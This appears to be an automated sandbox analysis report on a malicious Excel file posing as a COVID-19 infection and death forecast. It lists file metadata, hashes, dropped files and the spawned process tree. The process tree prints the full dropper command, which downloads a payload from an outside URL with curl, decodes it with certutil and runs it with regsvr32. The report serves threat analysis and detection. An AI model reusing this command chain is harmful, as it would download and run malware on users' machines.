File name: | COVID-19 감염자 및 사망자 예측.xls |
Full analysis: | https://app.any.run/tasks/c46376c2-6f9f-4157-b834-d6d3e7cbde76 |
Verdict: | Malicious activity |
Analysis date: | July 13, 2020, 02:38:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: openpyxl, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jul 8 18:51:14 2020, Last Saved Time/Date: Thu Jul 9 08:16:08 2020, Security: 0 |
MD5: | 268EFE92A6E16C89E62BF0C32113D0C9 |
SHA1: | D42D766A18FC56170FF2978A2BF07BD9CAFAC3E8 |
SHA256: | 00E82DD014370C9DB5A95FD0FD3A5438E4A51F4D64A15DDFFAA77F2E806D2A74 |
SSDEEP: | 6144:wxEtjPOtioVjDGUU1qfDlavx+W2QnAbz3t3uWT9qwxfRj1NlSgD8lNSQyURDKVyc:c35v5fjvlZDKoQ949IQgQ9zU+kcC |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 31 |
HeadingPairs: |
|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CodePage: | Unicode (UTF-8) |
Security: | None |
ModifyDate: | 2020:07:09 07:16:08 |
CreateDate: | 2020:07:08 17:51:14 |
Software: | Microsoft Excel |
LastModifiedBy: | USER |
Author: | openpyxl |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2264 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
2196 | cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60®svr32 /s "%temp%\lk.tmp" | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 3 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2644 | certutil -decode "C:\Users\admin\AppData\Local\Temp\1.tmp" "C:\Users\admin\AppData\Local\Temp\lk.tmp" | C:\Windows\system32\certutil.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 2147942402 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3812 | cmd /c del "C:\Users\admin\AppData\Local\Temp\1.tmp" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2076 | timeout 60 | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3220 | regsvr32 /s "C:\Users\admin\AppData\Local\Temp\lk.tmp" | C:\Windows\system32\regsvr32.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Exit code: 3 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRC0B2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACCD76C5.emf | emf | |
MD5:50BEF0FC1D1741D0CA3BBA19B2ACF71C | SHA256:C904300F6CCD82506C5D7C3CBEBA44B38430566C99964D1259460CF30DE8AA8E | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70D63F69.emf | emf | |
MD5:3E9FFDD275AC38C8AA6C2E9665E75462 | SHA256:DFA4168D55AE03F22C0F9D744557CB2FE7BCFF52866FC4B5B26EB682DDA5DA06 | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\25AA8B08.emf | emf | |
MD5:F53FBE8CD5C53676C283FCA53D319CA0 | SHA256:7BB98D54E83677AC7092C789AD5CF8DC3CB82BE002F2CBFC8B094BE37AA7FE87 | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\Excel8.0\MSForms.exd | tlb | |
MD5:54150BF0F5B95D2F221A6BD75D109D8D | SHA256:E3FBEC052DAEA62411C6DFEAA645016057A428B33B0C0AACDD293F07DD183F66 | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49660E56.emf | emf | |
MD5:F02D196959169825608B8081C866AE6B | SHA256:376A571E5584F3F2AEC5FCC21A4C5AC9B53B6E97ABA2EA6811A65C338EBC6483 | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE6FC4D4.emf | emf | |
MD5:240B486BB1A716ED73194870173AC5C9 | SHA256:A743ACB7F05CCB615B50B70C47325D723E5A9762E0C2D4976F2C32675966D445 | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA4AFE5F.emf | emf | |
MD5:BD3D13AFA2AB30D1777D6A830594554B | SHA256:CB38AAC890CE449DA8692D617424F6D72F1CF709C17B0452AC1A2DA5F5E91FD4 |